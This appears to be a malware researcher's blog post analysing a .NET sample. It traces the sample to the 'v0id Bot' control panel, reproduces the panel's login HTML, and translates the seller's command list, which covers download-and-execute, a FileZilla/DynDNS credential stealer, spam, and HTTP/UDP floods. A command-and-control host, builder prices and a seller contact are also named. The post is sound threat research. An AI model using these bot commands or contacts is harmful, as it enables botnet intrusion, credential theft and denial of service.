Yesterday a malware researcher asked me what this sample does.
http://www.virustotal.com/analisis/ec295ccdc2f03cc642a57b60bf1340fcc3ec2b8ecb61b0ee648c9b3bb6af7427-1267604113It is a .NET application. Online analysis services don't show any malicious activity.
Looking at the string inside the file reveals an url.
nexus88.scene-hosting.info/bot/
It is a control panel for something called "v0id Bot".
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>v0id Bot ::: Login</title>
<link href="css/main.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="main">
<center><p class="caption">Login</p>
<form action="index.php" method="post">
<p class="text-norm">
<label> Username</label>
<br />
<input class="txtdborder" type="text" name="user" tabindex="1" />
<br />
<label>Password</label>
<br />
<input class="txtdborder" type="password" name="pw" tabindex="2" />
<br />
<br />
<input class="btndoubleborder" type="submit" name="submit" id="submit" value="Absenden" tabindex="3" />
</p>
</form><br />
<p class="named">Design and Code by RedShark</p>
</center>
</div>
</body>
</html>
But what is "v0id Bot" ? Googling for the name returns this result.
http://tool-store.info/?page_id=52
It seems to be a new bot and has probably German origin.




Here is translation of the function list:
(+) stop bot -> specific bot -> [end] pcname
(+) stop all bots -> [endall]
(+) open website (hidden) -> [run]
www.google.de number
(+) open website (hidden) -> [visit]
www.google.de number
(+) download & execute -> [dl]
www.server.com/serv.exe 1 (1=execute 0=download only)
(+) switch to host until next reboot -> [host] website
(+) display computername -> [pcname]
(+) e-mail spam/bombing -> [spam] youremail@mail.ru victim@mail.ru Subject Body SMTP PORT Mailpass
(+) stealer (No-ip,DynDns & Filezilla) -> [steal] yourwebsite.com/send.php
(+) HTTP Flood -> [http]
www.google.de intervalinms threads
(+) UDP Flood -> [udp] host port threads sockets
Price:
v0id Bot Builder FUD = 10 PSC
v0id Bot Builder FUD + 2 FUD Stubs Update = 20 PSC
Gold -> v0id Bot Builder FUD + Unlimited FUD Stubs + Support = 50 PSC
Contact: 560281951